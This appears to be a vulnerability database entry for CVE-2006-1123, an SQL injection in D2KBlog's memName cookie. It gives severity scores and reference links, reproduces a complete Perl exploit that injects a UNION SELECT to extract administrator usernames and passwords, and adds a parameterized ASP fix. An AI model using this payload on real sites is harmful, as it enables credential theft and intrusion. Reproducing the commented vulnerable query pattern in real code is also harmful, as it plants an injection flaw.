CVE-2006-1123
CVSS 10.0
Published: 2006-03-09 16:02:00
Revised: 2011-03-07 21:32:06

[Original] SQL injection vulnerability in D2KBlog 1.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via the memName parameter in a cookie.


[CNNVD] D2KBlog Multiple SQL Injection Vulnerabilities (CNNVD-200603-139)

        D2KBlog 1.0.3 and earlier versions contain a SQL injection vulnerability; a remote attacker can execute arbitrary SQL commands via the memName parameter.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:d2ksoft:d2kblog:1.0.1
cpe:/a:d2ksoft:d2kblog:1.0
cpe:/a:d2ksoft:d2kblog:1.0.2
cpe:/a:d2ksoft:d2kblog:1.0.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1123
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1123
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-139
(Official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2006/0896
(UNKNOWN)  VUPEN  ADV-2006-0896
http://www.securityfocus.com/archive/1/archive/1/427103/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060308 [KAPDA::#32] - d2kBlog 1.0.3 Multiple Vulnerabilities
http://secunia.com/advisories/19177
(VENDOR_ADVISORY)  SECUNIA  19177
http://xforce.iss.net/xforce/xfdb/25215
(UNKNOWN)  XF  d2kblog-memname-sql-injection(25215)
http://www.securityfocus.com/bid/17035
(UNKNOWN)  BID  17035
http://www.osvdb.org/23770
(UNKNOWN)  OSVDB  23770
http://securityreason.com/securityalert/559
(UNKNOWN)  SREASON  559

- Vulnerability information

D2KBlog Multiple SQL Injection Vulnerabilities
Critical  SQL injection
2006-03-09 00:00:00  2006-03-10 00:00:00
Remote
        D2KBlog 1.0.3 and earlier versions contain a SQL injection vulnerability; a remote attacker can execute arbitrary SQL commands via the memName parameter.

- Advisories and patches

        No data available

- Vulnerability information (1569)

d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit (EDBID:1569)
asp webapps
2006-03-09 Verified
0 DevilBox
N/A
#!/usr/bin/perl -w
# D2KBLOG SQL injection
# Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ]
# Exploited by : devil_box [ devil_box [at} kapda.ir ]
# member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net)

require LWP::UserAgent;
require HTTP::Request;

print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n";
print "\tKAPDA - Security Science Researchers Institute of Iran\r\n\r\n";
print "\tPoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n";
print "\tOriginal Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n";
print "\r\n=-=-=-==================================================================-=-=-=\r\n";

if (@ARGV != 2) {
    print "\tUsage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n";
    print "\tex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n";
    exit();
}

my $ua = LWP::UserAgent->new(env_proxy => 1, keep_alive => 1, timeout => 30);

my $Path = $ARGV[0];
my $Page = $ARGV[1];
my $URL  = "http://" . $Path . $Page;

print "|***| Connecting to " . $URL . " ...\r\n";

# The payload is carried in the memName subkey of a cookie named after the host.
my $r = HTTP::Request->new(GET => $URL . "?action=edit");
$r->header("Cookie" => $Path . "=memPassword=&memStatus=&memName=<!--'UNION%20ALL%20select%201,1,1,'**stxt**|UserName|:|'%2bmem_name%2b'|-=-|Password|:|'%2bmem_password%2b'|**etxt**',1,1,1,1,1,1,1,1,'Discovered%20and%20coded%20by%20farhadkey%20from%20KAPDA.ir'%20from%20blog_member%20where%20mem_status='SupAdmin'%20or%20'1'='-->");

my $res = $ua->request($r);

print "|***| Connected !\r\n";

if ($res->is_success) {
    print "|***| Extracting Username and Password ...\r\n\r\n";

    my $results = $res->content;

    # Print every marker-delimited fragment found in the response body.
    while ($results =~ /\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig) { print "-=-> $1 \r\n"; }

    print "\r\n\tExploit by Devil_Box\r\n\t\tDiscovery by Farhad koosha\r\n\r\n";
} else {
    die "\r\n|***| " . $res->status_line;
}

# milw0rm.com [2006-03-09]

- Vulnerability information

23770
D2KBlog profile.asp Cookie memName Field SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability description

D2KBlog contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'profile.asp' script not properly sanitizing user-supplied input from the 'memName' cookie field. This may allow an attacker to inject or manipulate SQL queries in the back-end database.
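The fix for the flaw described above, added here as an illustration and not D2KBlog's own code: a classic ASP handler that reads the memName cookie and queries blog_member through an ADODB parameterized command instead of string concatenation. The cookie key, connection string, column names and the 50-character length limit are assumptions.

```asp
<%
' Added illustration, not D2KBlog's code. Cookie layout follows the advisory
' (a dictionary cookie keyed by the host with a memName subkey); the connection
' string, column names and 50-character limit are assumptions.
Option Explicit
Const adCmdText = 1
Const adVarChar = 200
Const adParamInput = 1

Dim memName, conn, cmd, rs
memName = Request.Cookies(Request.ServerVariables("SERVER_NAME"))("memName")

' Reject anything that is not a plausible member name before it reaches SQL.
If Len(memName) = 0 Or Len(memName) > 50 Then
    Response.Status = "403 Forbidden"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=SQLOLEDB;Data Source=(local);Initial Catalog=blog;Integrated Security=SSPI"

' VULNERABLE form, shown only for contrast: the cookie value is spliced into the
' SQL text, so a crafted memName rewrites the query (the bug behind CVE-2006-1123).
'   Set rs = conn.Execute("SELECT mem_name, mem_status FROM blog_member WHERE mem_name='" & memName & "'")

' HARDENED form: the value travels as a typed parameter and is never parsed as SQL.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT mem_name, mem_status FROM blog_member WHERE mem_name = ?"
cmd.Parameters.Append cmd.CreateParameter("@memName", adVarChar, adParamInput, 50, memName)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Status = "403 Forbidden"
Else
    ' A name in a cookie is not proof of identity; gate action=edit on a
    ' server-side session established at login, not on cookie contents.
    Response.Write Server.HTMLEncode(rs("mem_name"))
End If
rs.Close
conn.Close
%>
```

Parameterizing the query removes the injection; the session check is the separate control that stops a forged cookie from selecting whose profile is edited.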

- Timeline

2006-03-08  2006-01-01
2006-03-08  Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author
